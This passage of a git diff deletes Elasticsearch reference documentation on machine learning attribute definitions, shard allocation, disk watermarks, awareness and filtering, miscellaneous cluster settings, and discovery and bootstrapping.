{es} searches when the {dfeed} does not use -aggregations. The default value is `1000`. The maximum value is the value of -`index.max_result_window` which is 10,000 by default. -end::scroll-size[] - -tag::search-bucket-avg[] -The average search time per bucket, in milliseconds. -end::search-bucket-avg[] - -tag::search-count[] -The number of searches run by the {dfeed}. -end::search-count[] - -tag::search-exp-avg-hour[] -The exponential average search time per hour, in milliseconds. -end::search-exp-avg-hour[] - -tag::search-time[] -The total time the {dfeed} spent searching, in milliseconds. -end::search-time[] - -tag::size[] -Specifies the maximum number of {dfanalytics-jobs} to obtain. The default value -is `100`. -end::size[] - -tag::size-models[] -Specifies the maximum number of models to obtain. The default value -is `100`. -end::size-models[] - -tag::snapshot-id[] -A numerical character string that uniquely identifies the model snapshot. -end::snapshot-id[] - -tag::sparse-bucket-count[] -The number of buckets that contained few data points compared to the expected -number of data points. If your data contains many sparse buckets, consider using -a longer `bucket_span`. -end::sparse-bucket-count[] - -tag::standardization-enabled[] -If `true`, the following operation is performed on the columns before computing -{olscores}: (x_i - mean(x_i)) / sd(x_i). Defaults to `true`. For -more information about this concept, see -https://en.wikipedia.org/wiki/Feature_scaling#Standardization_(Z-score_Normalization)[Wikipedia]. -end::standardization-enabled[] - -tag::state-anomaly-job[] -The status of the {anomaly-job}, which can be one of the following values: -+ --- -* `closed`: The job finished successfully with its model state persisted. The -job must be opened before it can accept further data. -* `closing`: The job close action is in progress and has not yet completed. A -closing job cannot accept further data. -* `failed`: The job did not finish successfully due to an error. This situation -can occur due to invalid input data, a fatal error occurring during the -analysis, or an external interaction such as the process being killed by the -Linux out of memory (OOM) killer. If the job had irrevocably failed, it must be -force closed and then deleted. If the {dfeed} can be corrected, the job can be -closed and then re-opened. -* `opened`: The job is available to receive and process data. -* `opening`: The job open action is in progress and has not yet completed. --- -end::state-anomaly-job[] - -tag::state-datafeed[] -The status of the {dfeed}, which can be one of the following values: -+ --- -* `starting`: The {dfeed} has been requested to start but has not yet started. -* `started`: The {dfeed} is actively receiving data. -* `stopping`: The {dfeed} has been requested to stop gracefully and is -completing its final action. -* `stopped`: The {dfeed} is stopped and will not receive data until it is -re-started. --- -end::state-datafeed[] - -tag::summary-count-field-name[] -If this property is specified, the data that is fed to the job is expected to be -pre-summarized. This property value is the name of the field that contains the -count of raw data points that have been summarized. The same -`summary_count_field_name` applies to all detectors in the job. -+ --- -NOTE: The `summary_count_field_name` property cannot be used with the `metric` -function. - --- -end::summary-count-field-name[] - -tag::tags[] -A comma delimited string of tags. A trained model can have many tags, or none. -When supplied, only trained models that contain all the supplied tags are -returned. -end::tags[] - -tag::time-format[] -The time format, which can be `epoch`, `epoch_ms`, or a custom pattern. The -default value is `epoch`, which refers to UNIX or Epoch time (the number of -seconds since 1 Jan 1970). The value `epoch_ms` indicates that time is measured -in milliseconds since the epoch. The `epoch` and `epoch_ms` time formats accept -either integer or real values. + -+ -NOTE: Custom patterns must conform to the Java `DateTimeFormatter` class. -When you use date-time formatting patterns, it is recommended that you provide -the full date, time and time zone. For example: `yyyy-MM-dd'T'HH:mm:ssX`. -If the pattern that you specify is not sufficient to produce a complete -timestamp, job creation fails. -end::time-format[] - -tag::time-span[] -The time span that each search will be querying. This setting is only applicable -when the mode is set to `manual`. For example: `3h`. -end::time-span[] - -tag::timeout-start[] -Controls the amount of time to wait until the {dfanalytics-job} starts. Defaults -to 20 seconds. -end::timeout-start[] - -tag::timeout-stop[] -Controls the amount of time to wait until the {dfanalytics-job} stops. Defaults -to 20 seconds. -end::timeout-stop[] - -tag::timestamp-results[] -The start time of the bucket for which these results were calculated. -end::timestamp-results[] - -tag::tokenizer[] -The name or definition of the <> to use after -character filters are applied. This property is compulsory if -`categorization_analyzer` is specified as an object. Machine learning provides a -tokenizer called `ml_classic` that tokenizes in the same way as the -non-customizable tokenizer in older versions of the product. If you want to use -that tokenizer but change the character or token filters, specify -`"tokenizer": "ml_classic"` in your `categorization_analyzer`. -end::tokenizer[] - -tag::total-by-field-count[] -The number of `by` field values that were analyzed by the models. This value is -cumulative for all detectors in the job. -end::total-by-field-count[] - -tag::total-category-count[] -The number of categories created by categorization. -end::total-category-count[] - -tag::total-over-field-count[] -The number of `over` field values that were analyzed by the models. This value -is cumulative for all detectors in the job. -end::total-over-field-count[] - -tag::total-partition-field-count[] -The number of `partition` field values that were analyzed by the models. This -value is cumulative for all detectors in the job. -end::total-partition-field-count[] - -tag::training-percent[] -Defines what percentage of the eligible documents that will -be used for training. Documents that are ignored by the analysis (for example -those that contain arrays with more than one value) won’t be included in the -calculation for used percentage. Defaults to `100`. -end::training-percent[] - -tag::use-null[] -Defines whether a new series is used as the null series when there is no value -for the by or partition fields. The default value is `false`. -end::use-null[] - -tag::verbose[] -Defines whether the stats response should be verbose. The default value is `false`. -end::verbose[] diff --git a/docs/reference/modules/cluster.asciidoc b/docs/reference/modules/cluster.asciidoc deleted file mode 100644 index 4b9ede54506..00000000000 --- a/docs/reference/modules/cluster.asciidoc +++ /dev/null @@ -1,36 +0,0 @@ -[[modules-cluster]] -=== Cluster-level shard allocation and routing settings - -_Shard allocation_ is the process of allocating shards to nodes. This can -happen during initial recovery, replica allocation, rebalancing, or -when nodes are added or removed. - -One of the main roles of the master is to decide which shards to allocate to -which nodes, and when to move shards between nodes in order to rebalance the -cluster. - -There are a number of settings available to control the shard allocation process: - -* <> control allocation and - rebalancing operations. - -* <> explains how Elasticsearch takes available - disk space into account, and the related settings. - -* <> and <> control how shards - can be distributed across different racks or availability zones. - -* <> allows certain nodes or groups of - nodes excluded from allocation so that they can be decommissioned. - -Besides these, there are a few other <>. - -include::cluster/shards_allocation.asciidoc[] - -include::cluster/disk_allocator.asciidoc[] - -include::cluster/allocation_awareness.asciidoc[] - -include::cluster/allocation_filtering.asciidoc[] - -include::cluster/misc.asciidoc[] diff --git a/docs/reference/modules/cluster/allocation_awareness.asciidoc b/docs/reference/modules/cluster/allocation_awareness.asciidoc deleted file mode 100644 index 1ca4c9d8b67..00000000000 --- a/docs/reference/modules/cluster/allocation_awareness.asciidoc +++ /dev/null @@ -1,108 +0,0 @@ -[[shard-allocation-awareness]] -==== Shard allocation awareness - -You can use custom node attributes as _awareness attributes_ to enable {es} -to take your physical hardware configuration into account when allocating shards. -If {es} knows which nodes are on the same physical server, in the same rack, or -in the same zone, it can distribute the primary shard and its replica shards to -minimise the risk of losing all shard copies in the event of a failure. - -When shard allocation awareness is enabled with the -<> -`cluster.routing.allocation.awareness.attributes` setting, shards are only -allocated to nodes that have values set for the specified awareness attributes. -If you use multiple awareness attributes, {es} considers each attribute -separately when allocating shards. - -By default {es} uses <> -to route search or GET requests. However, with the presence of allocation awareness -attributes {es} will prefer using shards in the same location (with the same -awareness attribute values) to process these requests. This behavior can be -disabled by specifying `export ES_JAVA_OPTS="$ES_JAVA_OPTS -Des.search.ignore_awareness_attributes=true"` -system property on every node that is part of the cluster. - -NOTE: The number of attribute values determines how many shard copies are -allocated in each location. If the number of nodes in each location is -unbalanced and there are a lot of replicas, replica shards might be left -unassigned. - -[[enabling-awareness]] -===== Enabling shard allocation awareness - -To enable shard allocation awareness: - -. Specify the location of each node with a custom node attribute. For example, -if you want Elasticsearch to distribute shards across different racks, you might -set an awareness attribute called `rack_id` in each node's `elasticsearch.yml` -config file. -+ -[source,yaml] --------------------------------------------------------- -node.attr.rack_id: rack_one --------------------------------------------------------- -+ -You can also set custom attributes when you start a node: -+ -[source,sh] --------------------------------------------------------- -`./bin/elasticsearch -Enode.attr.rack_id=rack_one` --------------------------------------------------------- - -. Tell {es} to take one or more awareness attributes into account when -allocating shards by setting -`cluster.routing.allocation.awareness.attributes` in *every* master-eligible -node's `elasticsearch.yml` config file. -+ --- -[source,yaml] --------------------------------------------------------- -cluster.routing.allocation.awareness.attributes: rack_id <1> --------------------------------------------------------- -<1> Specify multiple attributes as a comma-separated list. --- -+ -You can also use the -<> API to set or update -a cluster's awareness attributes. - -With this example configuration, if you start two nodes with -`node.attr.rack_id` set to `rack_one` and create an index with 5 primary -shards and 1 replica of each primary, all primaries and replicas are -allocated across the two nodes. - -If you add two nodes with `node.attr.rack_id` set to `rack_two`, -{es} moves shards to the new nodes, ensuring (if possible) -that no two copies of the same shard are in the same rack. - -If `rack_two` fails and takes down both its nodes, by default {es} -allocates the lost shard copies to nodes in `rack_one`. To prevent multiple -copies of a particular shard from being allocated in the same location, you can -enable forced awareness. - -[[forced-awareness]] -===== Forced awareness - -By default, if one location fails, Elasticsearch assigns all of the missing -replica shards to the remaining locations. While you might have sufficient -resources across all locations to host your primary and replica shards, a single -location might be unable to host *ALL* of the shards. - -To prevent a single location from being overloaded in the event of a failure, -you can set `cluster.routing.allocation.awareness.force` so no replicas are -allocated until nodes are available in another location. - -For example, if you have an awareness attribute called `zone` and configure nodes -in `zone1` and `zone2`, you can use forced awareness to prevent Elasticsearch -from allocating replicas if only one zone is available: - -[source,yaml] -------------------------------------------------------------------- -cluster.routing.allocation.awareness.attributes: zone -cluster.routing.allocation.awareness.force.zone.values: zone1,zone2 <1> -------------------------------------------------------------------- -<1> Specify all possible values for the awareness attribute. - -With this example configuration, if you start two nodes with `node.attr.zone` set -to `zone1` and create an index with 5 shards and 1 replica, Elasticsearch creates -the index and allocates the 5 primary shards but no replicas. Replicas are -only allocated once nodes with `node.attr.zone` set to `zone2` are available. diff --git a/docs/reference/modules/cluster/allocation_filtering.asciidoc b/docs/reference/modules/cluster/allocation_filtering.asciidoc deleted file mode 100644 index 8aad7a97855..00000000000 --- a/docs/reference/modules/cluster/allocation_filtering.asciidoc +++ /dev/null @@ -1,77 +0,0 @@ -[[cluster-shard-allocation-filtering]] -==== Cluster-level shard allocation filtering - -You can use cluster-level shard allocation filters to control where {es} -allocates shards from any index. These cluster wide filters are applied in -conjunction with <> -and <>. - -Shard allocation filters can be based on custom node attributes or the built-in -`_name`, `_host_ip`, `_publish_ip`, `_ip`, `_host`, `_id` and `_tier` attributes. - -The `cluster.routing.allocation` settings are <>, enabling live indices to -be moved from one set of nodes to another. Shards are only relocated if it is -possible to do so without breaking another routing constraint, such as never -allocating a primary and replica shard on the same node. - -The most common use case for cluster-level shard allocation filtering is when -you want to decommission a node. To move shards off of a node prior to shutting -it down, you could create a filter that excludes the node by its IP address: - -[source,console] --------------------------------------------------- -PUT _cluster/settings -{ - "transient" : { - "cluster.routing.allocation.exclude._ip" : "10.0.0.1" - } -} --------------------------------------------------- - -[[cluster-routing-settings]] -===== Cluster routing settings - -`cluster.routing.allocation.include.{attribute}`:: - (<>) - Allocate shards to a node whose `{attribute}` has at least one of the - comma-separated values. - -`cluster.routing.allocation.require.{attribute}`:: - (<>) - Only allocate shards to a node whose `{attribute}` has _all_ of the - comma-separated values. - -`cluster.routing.allocation.exclude.{attribute}`:: - (<>) - Do not allocate shards to a node whose `{attribute}` has _any_ of the - comma-separated values. - -The cluster allocation settings support the following built-in attributes: - -[horizontal] -`_name`:: Match nodes by node name -`_host_ip`:: Match nodes by host IP address (IP associated with hostname) -`_publish_ip`:: Match nodes by publish IP address -`_ip`:: Match either `_host_ip` or `_publish_ip` -`_host`:: Match nodes by hostname -`_id`:: Match nodes by node id -`_tier`:: Match nodes by the node's <> role - -NOTE: `_tier` filtering is based on <> roles. Only -a subset of roles are <> roles, and the generic -<> will match any tier filtering. -a subset of roles that are <> roles, but the generic -<> will match any tier filtering. - - -You can use wildcards when specifying attribute values, for example: - -[source,console] ------------------------- -PUT _cluster/settings -{ - "transient": { - "cluster.routing.allocation.exclude._ip": "192.168.2.*" - } -} ------------------------- diff --git a/docs/reference/modules/cluster/disk_allocator.asciidoc b/docs/reference/modules/cluster/disk_allocator.asciidoc deleted file mode 100644 index 4e788a4e0f9..00000000000 --- a/docs/reference/modules/cluster/disk_allocator.asciidoc +++ /dev/null @@ -1,153 +0,0 @@ -[[disk-based-shard-allocation]] -==== Disk-based shard allocation settings -[[disk-based-shard-allocation-description]] -// tag::disk-based-shard-allocation-description-tag[] - -The disk-based shard allocator ensures that all nodes have enough disk space -without performing more shard movements than necessary. It allocates shards -based on a pair of thresholds known as the _low watermark_ and the _high -watermark_. Its primary goal is to ensure that no node exceeds the high -watermark, or at least that any such overage is only temporary. If a node -exceeds the high watermark then {es} will solve this by moving some of its -shards onto other nodes in the cluster. - -NOTE: It is normal for nodes to temporarily exceed the high watermark from time -to time. - -The allocator also tries to keep nodes clear of the high watermark by -forbidding the allocation of more shards to a node that exceeds the low -watermark. Importantly, if all of your nodes have exceeded the low watermark -then no new shards can be allocated and {es} will not be able to move any -shards between nodes in order to keep the disk usage below the high watermark. -You must ensure that your cluster has enough disk space in total and that there -are always some nodes below the low watermark. - -Shard movements triggered by the disk-based shard allocator must also satisfy -all other shard allocation rules such as -<> and -<>. If these rules are too strict then they -can also prevent the shard movements needed to keep the nodes' disk usage under -control. If you are using <> then {es} automatically -configures allocation filtering rules to place shards within the appropriate -tier, which means that the disk-based shard allocator works independently -within each tier. - -If a node is filling up its disk faster than {es} can move shards elsewhere -then there is a risk that the disk will completely fill up. To prevent this, as -a last resort, once the disk usage reaches the _flood-stage_ watermark {es} -will block writes to indices with a shard on the affected node. It will also -continue to move shards onto the other nodes in the cluster. When disk usage -on the affected node drops below the high watermark, {es} automatically removes -the write block. - -[[disk-based-shard-allocation-does-not-balance]] -[TIP] -==== -It is normal for the nodes in your cluster to be using very different amounts -of disk space. The <> of the cluster -depends only on the number of shards on each node and the indices to which -those shards belong. It considers neither the sizes of these shards nor the -available disk space on each node, for the following reasons: - -* Disk usage changes over time. Balancing the disk usage of individual nodes -would require a lot more shard movements, perhaps even wastefully undoing -earlier movements. Moving a shard consumes resources such as I/O and network -bandwidth and may evict data from the filesystem cache. These resources are -better spent handling your searches and indexing where possible. - -* A cluster with equal disk usage on every node typically performs no better -than one that has unequal disk usage, as long as no disk is too full. -==== - -You can use the following settings to control disk-based allocation: - -[[cluster-routing-disk-threshold]] -// tag::cluster-routing-disk-threshold-tag[] -`cluster.routing.allocation.disk.threshold_enabled` {ess-icon}:: -(<>) -Defaults to `true`. Set to `false` to disable the disk allocation decider. -// end::cluster-routing-disk-threshold-tag[] - -[[cluster-routing-watermark-low]] -// tag::cluster-routing-watermark-low-tag[] -`cluster.routing.allocation.disk.watermark.low` {ess-icon}:: -(<>) -Controls the low watermark for disk usage. It defaults to `85%`, meaning that {es} will not allocate shards to nodes that have more than 85% disk used. It can also be set to an absolute byte value (like `500mb`) to prevent {es} from allocating shards if less than the specified amount of space is available. This setting has no effect on the primary shards of newly-created indices but will prevent their replicas from being allocated. -// end::cluster-routing-watermark-low-tag[] - -[[cluster-routing-watermark-high]] -// tag::cluster-routing-watermark-high-tag[] -`cluster.routing.allocation.disk.watermark.high` {ess-icon}:: -(<>) -Controls the high watermark. It defaults to `90%`, meaning that {es} will attempt to relocate shards away from a node whose disk usage is above 90%. It can also be set to an absolute byte value (similarly to the low watermark) to relocate shards away from a node if it has less than the specified amount of free space. This setting affects the allocation of all shards, whether previously allocated or not. -// end::cluster-routing-watermark-high-tag[] - -`cluster.routing.allocation.disk.watermark.enable_for_single_data_node`:: - (<>) - For a single data node, the default is to disregard disk watermarks when - making an allocation decision. This is deprecated behavior and will be - changed in 8.0. This setting can be set to `true` to enable the - disk watermarks for a single data node cluster (will become default in 8.0). - -[[cluster-routing-flood-stage]] -// tag::cluster-routing-flood-stage-tag[] -`cluster.routing.allocation.disk.watermark.flood_stage` {ess-icon}:: -+ --- -(<>) -Controls the flood stage watermark, which defaults to 95%. {es} enforces a read-only index block (`index.blocks.read_only_allow_delete`) on every index that has one or more shards allocated on the node, and that has at least one disk exceeding the flood stage. This setting is a last resort to prevent nodes from running out of disk space. The index block is automatically released when the disk utilization falls below the high watermark. - -NOTE: You cannot mix the usage of percentage values and byte values within -these settings. Either all values are set to percentage values, or all are set to byte values. This enforcement is so that {es} can validate that the settings are internally consistent, ensuring that the low disk threshold is less than the high disk threshold, and the high disk threshold is less than the flood stage threshold. - -An example of resetting the read-only index block on the `my-index-000001` index: - -[source,console] --------------------------------------------------- -PUT /my-index-000001/_settings -{ - "index.blocks.read_only_allow_delete": null -} --------------------------------------------------- -// TEST[setup:my_index] --- -// end::cluster-routing-flood-stage-tag[] - -`cluster.info.update.interval`:: - (<>) - How often {es} should check on disk usage for each node in the - cluster. Defaults to `30s`. - -`cluster.routing.allocation.disk.include_relocations`:: - - deprecated:[7.5.0, Future versions will always account for relocations.] - Defaults to +true+, which means that Elasticsearch will take into account - shards that are currently being relocated to the target node when computing - a node's disk usage. Taking relocating shards' sizes into account may, - however, mean that the disk usage for a node is incorrectly estimated on - the high side, since the relocation could be 90% complete and a recently - retrieved disk usage would include the total size of the relocating shard - as well as the space already used by the running relocation. - - -NOTE: Percentage values refer to used disk space, while byte values refer to -free disk space. This can be confusing, since it flips the meaning of high and -low. For example, it makes sense to set the low watermark to 10gb and the high -watermark to 5gb, but not the other way around. - -An example of updating the low watermark to at least 100 gigabytes free, a high -watermark of at least 50 gigabytes free, and a flood stage watermark of 10 -gigabytes free, and updating the information about the cluster every minute: - -[source,console] --------------------------------------------------- -PUT _cluster/settings -{ - "transient": { - "cluster.routing.allocation.disk.watermark.low": "100gb", - "cluster.routing.allocation.disk.watermark.high": "50gb", - "cluster.routing.allocation.disk.watermark.flood_stage": "10gb", - "cluster.info.update.interval": "1m" - } -} --------------------------------------------------- diff --git a/docs/reference/modules/cluster/misc.asciidoc b/docs/reference/modules/cluster/misc.asciidoc deleted file mode 100644 index a12e8ca390a..00000000000 --- a/docs/reference/modules/cluster/misc.asciidoc +++ /dev/null @@ -1,179 +0,0 @@ -[[misc-cluster-settings]] -==== Miscellaneous cluster settings - -[[cluster-read-only]] -===== Metadata - -An entire cluster may be set to read-only with the following setting: - -`cluster.blocks.read_only`:: - (<>) - Make the whole cluster read only (indices do not accept write - operations), metadata is not allowed to be modified (create or delete - indices). - -`cluster.blocks.read_only_allow_delete`:: - (<>) - Identical to `cluster.blocks.read_only` but allows to delete indices - to free up resources. - -WARNING: Don't rely on this setting to prevent changes to your cluster. Any -user with access to the <> -API can make the cluster read-write again. - - -[[cluster-shard-limit]] -===== Cluster shard limit - -There is a soft limit on the number of shards in a cluster, based on the number -of nodes in the cluster. This is intended to prevent operations which may -unintentionally destabilize the cluster. - -IMPORTANT: This limit is intended as a safety net, not a sizing recommendation. The -exact number of shards your cluster can safely support depends on your hardware -configuration and workload, but should remain well below this limit in almost -all cases, as the default limit is set quite high. - -If an operation, such as creating a new index, restoring a snapshot of an index, -or opening a closed index would lead to the number of shards in the cluster -going over this limit, the operation will fail with an error indicating the -shard limit. - -If the cluster is already over the limit, due to changes in node membership or -setting changes, all operations that create or open indices will fail until -either the limit is increased as described below, or some indices are -<> or <> to bring the -number of shards below the limit. - -The cluster shard limit defaults to 1,000 shards per data node. -Both primary and replica shards of all open indices count toward the limit, -including unassigned shards. -For example, an open index with 5 primary shards and 2 replicas counts as 15 shards. -Closed indices do not contribute to the shard count. - -You can dynamically adjust the cluster shard limit with the following setting: - -[[cluster-max-shards-per-node]] -`cluster.max_shards_per_node`:: -+ --- -(<>) -Limits the total number of primary and replica shards for the cluster. {es} -calculates the limit as follows: - -`cluster.max_shards_per_node * number of data nodes` - -Shards for closed indices do not count toward this limit. Defaults to `1000`. -A cluster with no data nodes is unlimited. - -{es} rejects any request that creates more shards than this limit allows. For -example, a cluster with a `cluster.max_shards_per_node` setting of `100` and -three data nodes has a shard limit of 300. If the cluster already contains 296 -shards, {es} rejects any request that adds five or more shards to the cluster. - -NOTE: This setting does not limit shards for individual nodes. To limit the -number of shards for each node, use the -<> -setting. --- - -[[user-defined-data]] -===== User-defined cluster metadata - -User-defined metadata can be stored and retrieved using the Cluster Settings API. -This can be used to store arbitrary, infrequently-changing data about the cluster -without the need to create an index to store it. This data may be stored using -any key prefixed with `cluster.metadata.`. For example, to store the email -address of the administrator of a cluster under the key `cluster.metadata.administrator`, -issue this request: - -[source,console] -------------------------------- -PUT /_cluster/settings -{ - "persistent": { - "cluster.metadata.administrator": "sysadmin@example.com" - } -} -------------------------------- - -IMPORTANT: User-defined cluster metadata is not intended to store sensitive or -confidential information. Any information stored in user-defined cluster -metadata will be viewable by anyone with access to the -<> API, and is recorded in the -{es} logs. - -[[cluster-max-tombstones]] -===== Index tombstones - -The cluster state maintains index tombstones to explicitly denote indices that -have been deleted. The number of tombstones maintained in the cluster state is -controlled by the following setting: - -`cluster.indices.tombstones.size`:: -(<>) -Index tombstones prevent nodes that are not part of the cluster when a delete -occurs from joining the cluster and reimporting the index as though the delete -was never issued. To keep the cluster state from growing huge we only keep the -last `cluster.indices.tombstones.size` deletes, which defaults to 500. You can -increase it if you expect nodes to be absent from the cluster and miss more -than 500 deletes. We think that is rare, thus the default. Tombstones don't take -up much space, but we also think that a number like 50,000 is probably too big. - -include::{es-repo-dir}/indices/dangling-indices-list.asciidoc[tag=dangling-index-description] -You can use the <> to manage -this situation. - -[[cluster-logger]] -===== Logger - -The settings which control logging can be updated <> with the -`logger.` prefix. For instance, to increase the logging level of the -`indices.recovery` module to `DEBUG`, issue this request: - -[source,console] -------------------------------- -PUT /_cluster/settings -{ - "transient": { - "logger.org.elasticsearch.indices.recovery": "DEBUG" - } -} -------------------------------- - - -[[persistent-tasks-allocation]] -===== Persistent tasks allocation - -Plugins can create a kind of tasks called persistent tasks. Those tasks are -usually long-lived tasks and are stored in the cluster state, allowing the -tasks to be revived after a full cluster restart. - -Every time a persistent task is created, the master node takes care of -assigning the task to a node of the cluster, and the assigned node will then -pick up the task and execute it locally. The process of assigning persistent -tasks to nodes is controlled by the following settings: - -`cluster.persistent_tasks.allocation.enable`:: -+ --- -(<>) -Enable or disable allocation for persistent tasks: - -* `all` - (default) Allows persistent tasks to be assigned to nodes -* `none` - No allocations are allowed for any type of persistent task - -This setting does not affect the persistent tasks that are already being executed. -Only newly created persistent tasks, or tasks that must be reassigned (after a node -left the cluster, for example), are impacted by this setting. --- - -`cluster.persistent_tasks.allocation.recheck_interval`:: - (<>) - The master node will automatically check whether persistent tasks need to - be assigned when the cluster state changes significantly. However, there - may be other factors, such as memory usage, that affect whether persistent - tasks can be assigned to nodes but do not cause the cluster state to change. - This setting controls how often assignment checks are performed to react to - these factors. The default is 30 seconds. The minimum permitted value is 10 - seconds. diff --git a/docs/reference/modules/cluster/shards_allocation.asciidoc b/docs/reference/modules/cluster/shards_allocation.asciidoc deleted file mode 100644 index e26e732e345..00000000000 --- a/docs/reference/modules/cluster/shards_allocation.asciidoc +++ /dev/null @@ -1,140 +0,0 @@ -[[cluster-shard-allocation-settings]] -==== Cluster-level shard allocation settings - -You can use the following settings to control shard allocation and recovery: - -[[cluster-routing-allocation-enable]] -`cluster.routing.allocation.enable`:: -+ --- -(<>) -Enable or disable allocation for specific kinds of shards: - -* `all` - (default) Allows shard allocation for all kinds of shards. -* `primaries` - Allows shard allocation only for primary shards. -* `new_primaries` - Allows shard allocation only for primary shards for new indices. -* `none` - No shard allocations of any kind are allowed for any indices. - -This setting does not affect the recovery of local primary shards when -restarting a node. A restarted node that has a copy of an unassigned primary -shard will recover that primary immediately, assuming that its allocation id matches -one of the active allocation ids in the cluster state. - --- - -`cluster.routing.allocation.node_concurrent_incoming_recoveries`:: - (<>) - How many concurrent incoming shard recoveries are allowed to happen on a node. Incoming recoveries are the recoveries - where the target shard (most likely the replica unless a shard is relocating) is allocated on the node. Defaults to `2`. - -`cluster.routing.allocation.node_concurrent_outgoing_recoveries`:: - (<>) - How many concurrent outgoing shard recoveries are allowed to happen on a node. Outgoing recoveries are the recoveries - where the source shard (most likely the primary unless a shard is relocating) is allocated on the node. Defaults to `2`. - -`cluster.routing.allocation.node_concurrent_recoveries`:: - (<>) - A shortcut to set both `cluster.routing.allocation.node_concurrent_incoming_recoveries` and - `cluster.routing.allocation.node_concurrent_outgoing_recoveries`. - - -`cluster.routing.allocation.node_initial_primaries_recoveries`:: - (<>) - While the recovery of replicas happens over the network, the recovery of - an unassigned primary after node restart uses data from the local disk. - These should be fast so more initial primary recoveries can happen in - parallel on the same node. Defaults to `4`. - - -`cluster.routing.allocation.same_shard.host`:: - (<>) - Allows to perform a check to prevent allocation of multiple instances of - the same shard on a single host, based on host name and host address. - Defaults to `false`, meaning that no check is performed by default. This - setting only applies if multiple nodes are started on the same machine. - -[[shards-rebalancing-settings]] -==== Shard rebalancing settings - -A cluster is _balanced_ when it has an equal number of shards on each node -without having a concentration of shards from any index on any node. {es} runs -an automatic process called _rebalancing_ which moves shards between the nodes -in your cluster to improve its balance. Rebalancing obeys all other shard -allocation rules such as <> and <> which may prevent it from -completely balancing the cluster. In that case, rebalancing strives to acheve -the most balanced cluster possible within the rules you have configured. If you -are using <> then {es} automatically applies allocation -filtering rules to place each shard within the appropriate tier. These rules -mean that the balancer works independently within each tier. - -You can use the following settings to control the rebalancing of shards across -the cluster: - -`cluster.routing.rebalance.enable`:: -+ --- -(<>) -Enable or disable rebalancing for specific kinds of shards: - -* `all` - (default) Allows shard balancing for all kinds of shards. -* `primaries` - Allows shard balancing only for primary shards. -* `replicas` - Allows shard balancing only for replica shards. -* `none` - No shard balancing of any kind are allowed for any indices. --- - - -`cluster.routing.allocation.allow_rebalance`:: -+ --- -(<>) -Specify when shard rebalancing is allowed: - - -* `always` - Always allow rebalancing. -* `indices_primaries_active` - Only when all primaries in the cluster are allocated. -* `indices_all_active` - (default) Only when all shards (primaries and replicas) in the cluster are allocated. --- - -`cluster.routing.allocation.cluster_concurrent_rebalance`:: - (<>) - Allow to control how many concurrent shard rebalances are - allowed cluster wide. Defaults to `2`. Note that this setting - only controls the number of concurrent shard relocations due - to imbalances in the cluster. This setting does not limit shard - relocations due to <> or <>. - -[[shards-rebalancing-heuristics]] -==== Shard balancing heuristics settings - -Rebalancing works by computing a _weight_ for each node based on its allocation -of shards, and then moving shards between nodes to reduce the weight of the -heavier nodes and increase the weight of the lighter ones. The cluster is -balanced when there is no possible shard movement that can bring the weight of -any node closer to the weight of any other node by more than a configurable -threshold. The following settings allow you to control the details of these -calculations. - -`cluster.routing.allocation.balance.shard`:: - (<>) - Defines the weight factor for the total number of shards allocated on a node - (float). Defaults to `0.45f`. Raising this raises the tendency to - equalize the number of shards across all nodes in the cluster. - -`cluster.routing.allocation.balance.index`:: - (<>) - Defines the weight factor for the number of shards per index allocated - on a specific node (float). Defaults to `0.55f`. Raising this raises the - tendency to equalize the number of shards per index across all nodes in - the cluster. - -`cluster.routing.allocation.balance.threshold`:: - (<>) - Minimal optimization value of operations that should be performed (non - negative float). Defaults to `1.0f`. Raising this will cause the cluster - to be less aggressive about optimizing the shard balance. - - -NOTE: Regardless of the result of the balancing algorithm, rebalancing might -not be allowed due to forced awareness or allocation filtering. diff --git a/docs/reference/modules/discovery.asciidoc b/docs/reference/modules/discovery.asciidoc deleted file mode 100644 index 0fb42cc7edf..00000000000 --- a/docs/reference/modules/discovery.asciidoc +++ /dev/null @@ -1,74 +0,0 @@ -[[modules-discovery]] -== Discovery and cluster formation - -The discovery and cluster formation processes are responsible for discovering -nodes, electing a master, forming a cluster, and publishing the cluster state -each time it changes. All communication between nodes is done using the -<> layer. - -The following processes and settings are part of discovery and cluster -formation: - -<>:: - - Discovery is the process where nodes find each other when the master is - unknown, such as when a node has just started up or when the previous - master has failed. - -<>:: - - How {es} uses a quorum-based voting mechanism to - make decisions even if some nodes are unavailable. - -<>:: - - How {es} automatically updates voting configurations as nodes leave and join - a cluster. - -<>:: - - Bootstrapping a cluster is required when an {es} cluster starts up - for the very first time. In <>, with no - discovery settings configured, this is automatically performed by the nodes - themselves. As this auto-bootstrapping is - <>, running a node in - <> requires bootstrapping to be - explicitly configured via the - <>. - -<>:: - - It is recommended to have a small and fixed number of master-eligible nodes - in a cluster, and to scale the cluster up and down by adding and removing - master-ineligible nodes only. However there are situations in which it may - be desirable to add or remove some master-eligible nodes to or from a - cluster. This section describes the process for adding or removing - master-eligible nodes, including the extra steps that need to be performed - when removing more than half of the master-eligible nodes at the same time. - -<>:: - - Cluster state publishing is the process by which the elected master node - updates the cluster state on all the other nodes in the cluster. - -<>:: - - {es} performs health checks to detect and remove faulty nodes. - -<>:: - - There are settings that enable users to influence the discovery, cluster - formation, master election and fault detection processes. - -include::discovery/discovery.asciidoc[] - -include::discovery/quorums.asciidoc[] - -include::discovery/voting.asciidoc[] - -include::discovery/bootstrapping.asciidoc[] - -include::discovery/publishing.asciidoc[] - -include::discovery/fault-detection.asciidoc[] diff --git a/docs/reference/modules/discovery/bootstrapping.asciidoc b/docs/reference/modules/discovery/bootstrapping.asciidoc deleted file mode 100644 index d459bdb9204..00000000000 --- a/docs/reference/modules/discovery/bootstrapping.asciidoc +++ /dev/null @@ -1,147 +0,0 @@ -[[modules-discovery-bootstrap-cluster]] -=== Bootstrapping a cluster - -Starting an Elasticsearch cluster for the very first time requires the initial -set of <> to be explicitly defined on one or -more of the master-eligible nodes in the cluster. This is known as _cluster -bootstrapping_. This is only required the first time a cluster starts up: nodes -that have already joined a cluster store this information in their data folder -for use in a <>, and freshly-started nodes -that are joining a running cluster obtain this information from the cluster's -elected master. - -The initial set of master-eligible nodes is defined in the -<>. This should be -set to a list containing one of the following items for each master-eligible -node: - -- The <> of the node. -- The node's hostname if `node.name` is not set, because `node.name` defaults - to the node's hostname. You must use either the fully-qualified hostname or - the bare hostname <>. -- The IP address of the node's <>, if it is - not possible to use the `node.name` of the node. This is normally the IP - address to which <> resolves but - <>. -- The IP address and port of the node's publish address, in the form `IP:PORT`, - if it is not possible to use the `node.name` of the node and there are - multiple nodes sharing a single IP address. - -When you start a master-eligible node, you can provide this setting on the -command line or in the `elasticsearch.yml` file. After the cluster has formed, -this setting is no longer required. It should not be set for master-ineligible 